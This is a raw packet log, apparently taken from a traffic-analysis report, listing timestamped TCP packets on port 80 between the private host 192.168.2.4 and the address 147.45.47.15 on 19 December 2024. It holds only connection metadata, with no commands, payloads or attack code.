Dec 19, 2024 08:52:37.587925911 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.589592934 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.589751959 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.589869022 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.591613054 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.592072010 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.592128038 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.593473911 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.593640089 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.593693972 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.595357895 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.595662117 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.595719099 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.597302914 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.597415924 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.597487926 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.599159956 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.599291086 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.599359989 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.601061106 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.601223946 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.601615906 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.602915049 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.603102922 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.603156090 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.604839087 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.604981899 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.605025053 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.606739998 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.606962919 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.607017040 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.608160973 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.608169079 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.608238935 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.608608007 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.608864069 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.608985901 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.609215021 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.609221935 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.609266043 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.610054016 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.610281944 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.610330105 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.610616922 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.610965967 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.611032963 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.611351013 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.611424923 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.611704111 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.612373114 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.612566948 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.612957954 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.613990068 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.614322901 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.614375114 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.614543915 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.614552021 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.614705086 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.616319895 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.616327047 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.616409063 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.616693974 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.616700888 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.616753101 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.618725061 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.618911028 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.618918896 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.619086981 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.619613886 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.619684935 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.619981050 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.620374918 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.620451927 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.621416092 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.621479034 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.621665955 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.622004986 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.622250080 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.622256041 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.622330904 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.622941017 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.623023033 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.623688936 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.623934984 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.624000072 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.625689983 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.625809908 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.625865936 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.626111984 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.626120090 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.626164913 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.626837015 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.627022028 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.627233028 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.627546072 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.627895117 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.628129959 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.629961014 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.630201101 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.630208969 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.630398989 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.630928993 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.631042957 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.631495953 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.631763935 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.631848097 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.632267952 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.632275105 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.632345915 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.633917093 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.634402037 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.634449005 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.634728909 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.634736061 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.634913921 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.636430979 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.636437893 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.636816025 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.637515068 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.637521982 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.637593985 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.637742043 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.637748957 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.637788057 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.638277054 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.638541937 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.638770103 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.639153004 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.639348030 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.639400959 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.640156984 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.640244961 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.640430927 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.640882969 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.641058922 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.641120911 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.641618013 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.641625881 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.641676903 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.642824888 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.642838001 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.642899990 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.643517971 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.644360065 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.644433975 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.644504070 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.644701004 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.644936085 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.646240950 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.646253109 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.646287918 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.646713972 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.647068977 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.647120953 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.647331953 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.647344112 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.647461891 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.648361921 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.648456097 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.648514986 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.650336027 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.650357962 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.650641918 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.650681019 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.651058912 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.651160955 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.651424885 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.651437998 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.651468039 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.652225971 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.652441978 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.652499914 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.653933048 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.654124022 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.654179096 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.654503107 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.654516935 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.654707909 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.655174971 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.655194044 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.655237913 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.655857086 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.655905962 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.656219959 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.656233072 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.657046080 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.657090902 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.657268047 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.657280922 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.657322884 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.658034086 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.658190012 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.658253908 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.658519983 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.658531904 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.658569098 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.659672022 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.659842014 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.659856081 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.659905910 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.660641909 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.660741091 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.660943031 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.660996914 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.661362886 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.661612034 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.661624908 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.661729097 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.662272930 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.662287951 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.662331104 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.663444042 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.663626909 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.663691998 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.664002895 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.664017916 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.664088964 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.664644003 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.665035963 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.665117025 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.665349960 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.665710926 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.665756941 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.666065931 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.666079044 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.666117907 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.667254925 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.667385101 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.667537928 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.667733908 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.668200970 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.668252945 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.668469906 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.668482065 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.668524027 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.669167995 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.669573069 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.669766903 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.670568943 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.670622110 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.670672894 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.671035051 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.671358109 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.671538115 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.671761036 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.672069073 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.672081947 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.672139883 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.672817945 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.672897100 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.673208952 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.675292969 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.675477028 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.675487995 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.675533056 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.676177025 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.676188946 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.676274061 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.676274061 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.676984072 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.678756952 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.679023981 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.679223061 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.679326057 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.679338932 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.679383039 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.680264950 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.680330992 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.680514097 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.682312965 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.682583094 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.682643890 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.682871103 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.683187962 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.683234930 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.685162067 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.685236931 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.685339928 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.685863018 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.686067104 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.686151981 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.686486959 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.686959982 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.687021971 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.689335108 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.689563990 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.689672947 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.690150023 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.690243959 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.690254927 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.690299034 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.690421104 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.691010952 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.692939997 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.693202972 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.693439007 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.693753958 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.693767071 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.693819046 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.694916964 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.694962025 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.695354939 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.696593046 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.696604967 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.696882963 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.697256088 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.697715998 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.697848082 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.700155020 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.700205088 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.700542927 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.700906038 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.701102018 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.701153040 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.703561068 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.703886986 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.704080105 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.704652071 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.704829931 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.704878092 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.706983089 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.707151890 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.707221031 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.708230972 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.708434105 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.708492041 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.710675955 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.710689068 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.711034060 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.712021112 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.712033033 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.712074995 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.714215994 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.714229107 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.715338945 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.715603113 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.715918064 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.715987921 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.717709064 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.717724085 CET	80	49731	147.45.47.15	192.168.2.4
